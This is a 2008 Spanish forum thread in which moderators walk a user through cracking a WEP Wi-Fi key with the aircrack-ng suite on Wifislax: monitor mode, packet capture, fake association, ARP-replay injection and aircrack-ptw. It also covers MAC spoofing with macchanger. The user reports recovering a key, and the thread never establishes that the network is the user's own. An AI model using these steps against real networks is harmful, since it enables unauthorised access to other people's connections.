Bienvenido(a), Visitante. Por favor, ingresa o regístrate.
¿Perdiste tu email de activación?
03-09-2010, 11:26:29 (Viernes)
Inicio Ayuda Reglas Ingresar Registrarse
Noticias: El Mercadillo de CiudadWireless

 
Portes gratis para usuarios del foro en www.ciudadwireless.com
+  Seguridad Wireless - Wifi
|-+  Suite Seguridad Wireless
| |-+  Emulación de GNU/Linux sobre Windows (Moderador: drvalium)
| | |-+  VMware + Wifislax 3.1 + ataques		 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: 1 Ir Abajo Imprimir
Autor Tema: VMware + Wifislax 3.1 + ataques  (Leído 7372 veces)
meigallo99
*
Desconectado Desconectado

Mensajes: 25
« : 22-02-2008, 10:50:46 (Viernes) »
Hola
necesito un poquito mas de ayuda,no se como hacer la auditoria, ai van las preguntas:  Huh Huh

Modo monitor
1- pongo "airmon-ng start rausb0" y miro cual es la red de la auditoria y en que canal esta
2- cierro esa shell y pongo "airmon-ng start rausb0 X " con el canal en vez de la X
y ya tengo en modo monitor, vale.

seguimos, para capturar:
4-pongo "airodump-ng -w datos -cX --bssid MAC objetivo rausb0", en la "X" pongo el canal y en "MAC objetivo"
pongo el BSSID en cuestion.

Para inyectar:
Como saber si hay un cliente conectado?
y si es asi, cual es el MAC cliente
Si no hay cliente conectado:
1- conseguir asociacion "aireplay-ng -1 30 -e ESSID -a MAC objetivo -h 00:11:22:33:44:55 rausb0, como saber
cuando se consigue la asociación? Huh
2- inyectar despues de conseguir asociacion: "aireplay-ng -3 -x600 -b MAC objetivo -h 00:11:22:33:44:55 rausb0"
como veo si inyecta?, que es lo que se ve?, sube la opcion "packets"de la shell que tenemos en modo monitor? Huh

como conseguir clave?? cuando pongo "aircrack-ptw archivo.cap." para conseguir clave que tengo
que poner en "archivo"? Huh

Ya se que alomejor es mucho pedir pero seria magnifico si pudierais enviar alguna foto de alguna captura para poder guiarmos

tengo que pedir disculpas por anticipado por si alguna de las preguntas parecen ""tontas"" pero ai que darse de cuenta que no todos somos informaticos.


MUCHAS grazias a todos y en especial a drvalium, cuando pueda hacer la auditoria te aseguro que te hago un monumento en el medio de la plaza mayor, la mereces solo por tu paciencia.  Grin Grin
un saludo.  Grin Grin
En línea
ChimoC
Por la libertad y contra el terrorismo
Moderador Global
******
Desconectado Desconectado

Mensajes: 5488
« Respuesta #1 : 22-02-2008, 12:53:56 (Viernes) »
Cita de: meigallo99 en 22-02-2008, 10:50:46 (Viernes)
Hola
necesito un poquito mas de ayuda,no se como hacer la auditoria, ai van las preguntas:  Huh Huh

Modo monitor
1- pongo "airmon-ng start rausb0" y miro cual es la red de la auditoria y en que canal esta
2- cierro esa shell y pongo "airmon-ng start rausb0 X " con el canal en vez de la X
y ya tengo en modo monitor, vale.

seguimos, para capturar:
4-pongo "airodump-ng -w datos -cX --bssid MAC objetivo rausb0", en la "X" pongo el canal y en "MAC objetivo"
pongo el BSSID en cuestion.

Para inyectar:
Como saber si hay un cliente conectado? Te lo dice y lo ves en el airodump
y si es asi, cual es el MAC cliente Idem que antes
Si no hay cliente conectado:
1- conseguir asociacion "aireplay-ng -1 30 -e ESSID -a MAC objetivo -h 00:11:22:33:44:55 rausb0, como saber
cuando se consigue la asociación? Huh Te sale un monigote de association succ...  Smiley Y para poner esa MAC (11:22.....) antes debes haber cambiado tu mac con macchanger (por ejemplo)
2- inyectar despues de conseguir asociacion: "aireplay-ng -3 -x600 -b MAC objetivo -h 00:11:22:33:44:55 rausb0"
como veo si inyecta?, que es lo que se ve?, sube la opcion "packets"de la shell que tenemos en modo monitor? Huh Te subirán los datas y verás que tambien te suben los arp (XXXX arp)

como conseguir clave?? cuando pongo "aircrack-ptw archivo.cap." para conseguir clave que tengo
que poner en "archivo"? Huh Lo que has puesto detras del -w del airodump... en tu caso datos-01.cap

Ya se que alomejor es mucho pedir pero seria magnifico si pudierais enviar alguna foto de alguna captura para poder guiarmos Por favor... hay mucha gente que ha hecho manuales.... busca uno de AINZA... por ejemplo...

tengo que pedir disculpas por anticipado por si alguna de las preguntas parecen ""tontas"" pero ai que darse de cuenta que no todos somos informaticos. Yo tampoco lo soy... y muchos de los de aquí seguro que tampoco... pero dedicamos tiempo y meses o años..... es como todo... a base de leer, probar, paciencia y tenacidad.... se consigue


MUCHAS grazias a todos y en especial a drvalium, cuando pueda hacer la auditoria te aseguro que te hago un monumento en el medio de la plaza mayor, la mereces solo por tu paciencia.  Grin Grin La verdad es que si que tiene mucha paciencia  Grin
un saludo.  Grin Grin

Como ves te he dividido el post.... recuerda.. posts nuevos que nada tengan que ver con el post original...abrir un post para ello  Wink

Un saludo

ChimoC
En línea
Hemos puesto bozal al buscador del foro, ya no muerde, asi que USALO
drvalium
The Kid
Moderador
******
Desconectado Desconectado

Mensajes: 11114
« Respuesta #2 : 22-02-2008, 21:37:48 (Viernes) »
buenas

Citar
Para inyectar:
Como saber si hay un cliente conectado?

Si hay un cliente conectado lo notaras por que al haber trafico entre el router (punto de acceso) y el pc (cliente) los #data van subiendo.


Citar
y si es asi, cual es el MAC cliente

los clientes conectados son los que aparecen en la parte de abajo,  en la columna station salen las MAC de los clientes.


Citar
cuando se consigue la asociación?

cuando veas esto




Citar
como veo si inyecta?, que es lo que se ve?

¿que es lo que se ve? aunque te lo contara no me creerias Grin Grin Grin Grin, tu tranquilo,mira los numeritos y cuando empieces a inyectar ya lo notaras Wink

bueno, con esto tendrias que ir haciendo, la verdad es que no te he dicho nada que no te hubiese dicho ChimoC en ru respuesta, pero ¡¡¡¡¡como me mola poner fotos!!! Grin Grin Grin Grin Grin

Citar
ChimoC
antes debes haber cambiado tu mac con macchanger

yo no lo hago y sin embargo consigo asociarme, fíjate en las capturas Wink

saludos
« Última modificación: 23-02-2008, 01:48:53 (Sábado) por drvalium » En línea
Si pudiéramos juntar dos tontos y sacar un listo este mundo sería otro


Antes de preguntar lee esto

¿Por que "todo junto" va separado y "separado" va todo junto?
meigallo99
*
Desconectado Desconectado

Mensajes: 25
« Respuesta #3 : 28-02-2008, 18:57:10 (Jueves) »
hola:
mas problemillas.Haver cuando llego a la opcion de conseguir clave, pongo "aircrack-ptw datos-01.cap" y
me aparece esto:


wifislax ~ # aircrack-ptw datos-01.cap
Bienvenido a Aircrack PTW v 1.0.0 (Spanish Build 2)

Pagina oficial: http://www.cdc.informatik.tu-darmstadt.de/aircrack-ptw/
Traduccion y mejoras por: Stilo16v (http://www.seguridadwireless.net)

Buscando una nueva tabla
BSSID = **:*3:*9:**:*2:*D  Keyindex=0
Estadisticas para BSSID **:*3:4*:**:*2:*D  Keyindex=0 Paquetes=3

No se ha encontrado una clave, desea continuar con aircrack-ng [S,n]?:


si le digo que si me aparece:


Ejecutando aircrack-ng... (no funcionara si el fichero .cap esta dentro de /root)

Opening datos-01.cap
Read 296 packets.

   #  BSSID              ESSID                     Encryption

   1  00:0*:3*:**:**:*C      ********82                No data - WEP or WPA
   2  0*:**:49:*2:**:CD      WL**_5*                     WEP (9 IVs)
   3  0*:*9:*B:*2:0*:*6       ***O                           No data - WEP or WPA
   4  **:*2:*7:*0:*F:*1       domo********3        No data - WEP or WPA
   5  *0:A*:*5:*1:**:**       A*****I                     No data - WEP or WPA
   6  0*:*4:A*:**:6*:*8       C***                          WEP (58 IVs)
   7  *A:*8:*E:6*:**:*C       W*****S                   None (0.0.0.0)
   8  **:**:*B:*3:*A:**       l******98                  WEP (10 IVs)
   9  0*:1*:2*:0*:1*:A*       W****96                    No data - WEP or WPA

Index number of target network ?



(evidentemente sin nigun asterisco, y con los correspondientes numeros y letras de los BSSID y los ESSID)
Y si me fijo tanto en el BSSID como en el ESSID no aparece al que estoy haciendo la auditoria, no esta en esa lista.
tengo 660000 paquetes inyectados, o eso creo. en la otra shell me aparece:


Saving ARP requests in replay_arp-0228-162522.cap
You should also start airodump-ng to capture replies.
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Read 748000 packets (got 509043 ARP requests), sent 760012 packets...(243pps)


un saludo y muchas grazias.
En línea
drvalium
The Kid
Moderador
******
Desconectado Desconectado

Mensajes: 11114
« Respuesta #4 : 01-03-2008, 01:33:10 (Sábado) »
Buenas

cada vez que haces una prueba si siempre pones el mismo nombre al archivo (por ejemplo datos), wifislax los acumula y autonumera en vez de sobrescribirlos.


Prueba a entrar en la carpeta Home desde el icono del escritorio busca el archivo "datos" con la numeración mas alta y arrástralo a la consola.

según el ejemplo de la captura quedaría así
Código:
aircrack-ptw /root/datos-08.cap


saludos

PD:creo que hay una forma de unir todos los .cap en un solo archivo, te lo miro Wink
En línea
Si pudiéramos juntar dos tontos y sacar un listo este mundo sería otro


Antes de preguntar lee esto

¿Por que "todo junto" va separado y "separado" va todo junto?
katmox
*
Desconectado Desconectado

Mensajes: 16
« Respuesta #5 : 02-03-2008, 13:20:04 (Domingo) »
Cita de: drvalium en 01-03-2008, 01:33:10 (Sábado)

PD:creo que hay una forma de unir todos los .cap en un solo archivo, te lo miro Wink

en el Aircrack-ng  tienes una utilidad  llamada  Ivstools con la que puedes unir  capturas  .cap

aqui tienes la informacion:
http://www.wirelessdefence.org/Contents/Aircrack-ng_WinIvstools.htm
En línea
drvalium
The Kid
Moderador
******
Desconectado Desconectado

Mensajes: 11114
« Respuesta #6 : 02-03-2008, 19:57:10 (Domingo) »
buenas

Puedes unir los .cap con el comando mergecap, la cosa seria así:

 
Código:
mergecap archivo-01 archivo-02 archivo-03 -w resultado.cap

En referencia a las capturas anteriores quedaria así


después seria esto:

Código:
aircrack-ptw ' /root/todoslosdatos.cap'


Si te interesa profundizar existe este tema abierto:

Como unir cap??

saludos
En línea
Si pudiéramos juntar dos tontos y sacar un listo este mundo sería otro


Antes de preguntar lee esto

¿Por que "todo junto" va separado y "separado" va todo junto?
meigallo99
*
Desconectado Desconectado

Mensajes: 25
« Respuesta #7 : 07-03-2008, 10:41:16 (Viernes) »
ola
vale y una vez que los e unido que tengo que poner Huh
todoslodatos.cap en vez de datos-01.cap  Huh Huh
cuando pueda ya lo pruebo y os comento que estoy muy liado y no puedo acer nada, tengo el ordenador aparcado  Grin Grin
un saludo
En línea
drvalium
The Kid
Moderador
******
Desconectado Desconectado

Mensajes: 11114
« Respuesta #8 : 07-03-2008, 22:19:24 (Viernes) »
buenas

Cita de: meigallo99 en 07-03-2008, 10:41:16 (Viernes)
todoslodatos.cap en vez de datos-01.cap  Huh Huh

correcto.

saludos
En línea
Si pudiéramos juntar dos tontos y sacar un listo este mundo sería otro


Antes de preguntar lee esto

¿Por que "todo junto" va separado y "separado" va todo junto?
meigallo99
*
Desconectado Desconectado

Mensajes: 25
« Respuesta #9 : 18-03-2008, 13:46:06 (Martes) »
olaa
ok os comento:
217167 paquetes inyectados y vuala!!!! clave de 28 cifras a tomar por culo!! con perdon.
magnifico, me parece increible, 28 cifras y tardo en descifrarla como 45 minutos!!!!.
Dr.valium eres el mejor. muchas grazias por tu ayuda, qualquier cosa que querais solo teneis que preguntar, me seguire conectando al foro modo regular y todo lo que querais ya sabeis.
un saludo a todos y muchisimas grazias a  Dr.valium.
« Última modificación: 23-03-2008, 20:52:30 (Domingo) por meigallo99 » En línea
drvalium
The Kid
Moderador
******
Desconectado Desconectado

Mensajes: 11114
« Respuesta #10 : 18-03-2008, 21:43:28 (Martes) »
buenas

felicitaciones por tu éxito.

Cita de: megaillo99
217167 paquetes inyectados y vuala!!!! clave de 28 cifras a tomar por culo!! con perdon

usando aircrack-ptw con 100.000 deberia bastar, en ocasiones con 50.000 ya es suficiente.

Cita de: megaillo99
me seguire conectando al foro modo regular

me alegra saberlo.  Cheesy

Cita de: megaillo99
MUCHISIMAS GRAZIAS A DR.VALIUM

De nada, aquí estamos para lo que necesites.

saludos


PD: por norma general escribir en mayúsculas significa que gritas a la gente, se que no es tu caso y que lo que querías era resaltar tus agradecimientos, para esos casos es mejor usar las negritas o cambiar el color de las fuentes, por favor si puedes edita el post y quita las mayúsculas  Wink.

En línea
Si pudiéramos juntar dos tontos y sacar un listo este mundo sería otro


Antes de preguntar lee esto

¿Por que "todo junto" va separado y "separado" va todo junto?
Páginas: 1 Ir Arriba Imprimir 
« anterior próximo »
Ir a:  


Ingresar con nombre de usuario, contraseña y duración de la sesión


elHacker     designhacks     anelkaos     laUltimaEsencia

BitsDeLocos     gokteam     TuFonera     unMundoLibre

Powered by SMF 1.1.11 | SMF © 2006-2008, Simple Machines LLC
Consejos publicitarios